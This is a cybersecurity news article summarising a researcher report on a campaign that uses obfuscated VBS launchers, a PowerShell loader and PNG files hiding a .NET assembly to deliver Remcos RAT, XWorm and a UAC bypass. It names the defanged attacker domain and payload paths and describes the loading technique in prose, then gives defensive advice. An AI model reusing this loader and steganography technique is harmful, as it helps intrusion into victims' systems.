Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
AsyncRAT Campaign Leverages ScreenConnect to Evade Detection
July 2, 2026
AsyncRAT Campaign Exploits Cloudflare Tunnels and Python for Malware Delivery
July 2, 2026
New Microsoft 365 Phishing Uses OAuth Device Code Flow to Steal Tokens
July 2, 2026
Home/Threats/Open Directory Malware Campaign Delivers RAT Payloads via VBS and PNG Loaders
Threats

Open Directory Malware Campaign Delivers RAT Payloads via VBS and PNG Loaders

Key Takeaways A sophisticated, multi-stage malware campaign is actively deploying Remote Access Trojans (RATs) through a flexible, open-directory infrastructure. The attack chain utilizes obfuscated...

Jennifer sherman
Jennifer sherman
March 25, 2026 4 Min Read
43 0

Key Takeaways

  • A sophisticated, multi-stage malware campaign is actively deploying Remote Access Trojans (RATs) through a flexible, open-directory infrastructure.
  • The attack chain utilizes obfuscated Visual Basic Script (VBS) files to launch fileless PowerShell loaders, which then retrieve malicious payloads hidden within seemingly benign PNG image files.
  • Affected systems can be compromised with XWorm variants and Remcos RAT, along with a User Account Control (UAC) bypass, granting attackers persistent remote access and elevated privileges.
  • The campaign leverages an adaptable command-and-control (C2) setup, allowing threat actors to rapidly change or expand their malicious arsenal.

A complex, multi-stage malware operation has emerged, leveraging obfuscated Visual Basic Script (VBS) files, image-based loaders, and remote access trojans (RATs) to infiltrate target systems. Details of this campaign were uncovered by cybersecurity researchers at LevelBlue’s SpiderLabs Cyber Threat Intelligence team.

Table Of Content

  • Key Takeaways
  • Initial Detection and Unveiling the Campaign
  • Attacker Infrastructure: The Open Directory Advantage
  • Inside the Infection Mechanism: VBS to In-Memory RAT Execution
  • What You Should Do

Initially, an endpoint detection in early 2026 flagged a suspicious VBS file. What appeared to be an isolated incident quickly revealed a more organized threat: a reusable delivery framework capable of distributing diverse malware payloads across multiple attack vectors from a unified infrastructure.

Initial Detection and Unveiling the Campaign

The campaign first came to light with the discovery of a VBS file, named Name_File.vbs, located in the UsersPublicDownloads directory of a compromised endpoint. SentinelOne’s endpoint protection successfully quarantined the file before it could fully execute, but its encoded contents prompted further investigation.

Decryption of the VBS script exposed a Base64-encoded PowerShell command containing external network references, indicating an intent to fetch additional malicious components from a remote server. This initial alert provided LevelBlue analysts with a crucial entry point into a much broader cyber operation.

The subsequent investigation by LevelBlue’s SpiderLabs team revealed an attacker-controlled domain hosting numerous obfuscated VBS files. Each file was designed to deliver a different malware payload, including various XWorm variants and Remcos RAT, often disguised as plain text files. The researchers also identified a separate infection chain on the same infrastructure, initiated by a fake PDF file, confirming the campaign’s deliberate multi-vector design. A detailed report on the campaign can be found in the LevelBlue blog.

Attacker Infrastructure: The Open Directory Advantage

The core of the attacker’s infrastructure revolved around openly accessible directories hosted on the domain news4me[.]xyz. Specific subdirectories like /coupon/, /protector/, and /invoice/ each played a distinct role in the attack. These directories were used for staging VBS launchers, hosting obfuscated payload files, and delivering alternative infection vectors.

This “open directory” strategy was a deliberate design choice, providing the attackers with significant operational flexibility. It allowed them to rapidly update, rotate, or expand their hosted payloads without altering the underlying delivery logic. This adaptive system ensures continued operation even if specific components are detected and mitigated.

Inside the Infection Mechanism: VBS to In-Memory RAT Execution

The infection process initiates with a VBS file that functions solely as a launcher, devoid of any active malicious code itself.

Name_File.vbs content (Source - LevelBlue)
Name_File.vbs content (Source – LevelBlue)

This script is heavily obscured using Unicode obfuscation. Removing these layers reveals a Base64-encoded PowerShell command, which serves as the true operational core of the attack.

Name_File.vbs Unicode removal (Source - LevelBlue)
Name_File.vbs Unicode removal (Source – LevelBlue)

The decoded PowerShell command acts as a fileless loader. It enforces TLS 1.2 and employs the Net.WebClient class to retrieve a remote file from an Internet Archive URL.

Name_File.vbs decoded PowerShell command (Source - LevelBlue)
Name_File.vbs decoded PowerShell command (Source – LevelBlue)

Instead of downloading a standard executable, the loader fetches a PNG image file named MSI_PRO_with_b64.png. This image appears innocuous, but it secretly harbors a Base64-encoded .NET assembly, known as PhantomVAI, embedded between custom BaseStart and BaseEnd markers. This assembly is loaded directly into memory via Reflection.Assembly::Load, allowing it to execute entirely in RAM and effectively bypass many file-based security defenses.

Once PhantomVAI is active, it receives two URLs through its VAI method for subsequent execution. The first URL, news4me[.]xyz/protector/johnremcos.txt, contains an obfuscated string that decodes into a fully functional instance of the Remcos RAT, providing the attacker with persistent remote access. The second URL delivers uac.png, another PNG file containing a User Account Control (UAC) Bypass DLL, embedded in the same format, designed to silently escalate privileges on the compromised system. This combination of payloads grants the attackers comprehensive control while leaving minimal traditional file artifacts.

What You Should Do

  • Restrict Script Execution: Implement policies to restrict the execution of .vbs and .bat files from user-writable directories, such as UsersPublic.
  • Enforce PowerShell Policies: Apply constrained PowerShell policies and enable comprehensive logging for in-memory execution to detect fileless attacks.
  • Network Filtering: Block WebDAV-based connections and consider filtering traffic to and from .xyz top-level domains to disrupt communication with known attacker infrastructure.
  • Advanced Endpoint Protection: Ensure your endpoint detection and response (EDR) solutions are configured to monitor for suspicious in-memory activity and fileless execution techniques, not just file-based threats.
  • Threat Intelligence Integration: Integrate external threat intelligence feeds to stay updated on new attacker tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs).

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackMalwareSecurityThreat

Share Article

Jennifer sherman

Jennifer sherman

Jennifer is a cybersecurity news reporter covering data breaches, ransomware campaigns, and dark web markets. With a background in incident response, Jennifer provides unique insights into how organizations respond to cyber attacks and the evolving tactics of threat actors. Her reporting has covered major breaches affecting millions of users and has helped organizations understand emerging threats. Jennifer combines technical knowledge with investigative journalism to deliver in-depth coverage of cybersecurity incidents.

Previous Post

China-Linked Hackers Target Southeast Asian Military Systems in Ongoing Espionage Campaign

Next Post

Mirai Botnets Evolve, Pose Massive DDoS and Proxy Abuse Threat

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Citrix Bleed (CVE-2023-4966) Critical Vulnerability Actively Exploited
July 2, 2026
DHS Confirms Breach of HSIN Information Sharing Network
July 2, 2026
ChatGPT Flaw Exposes User Files, Poses System Access Risk
July 2, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us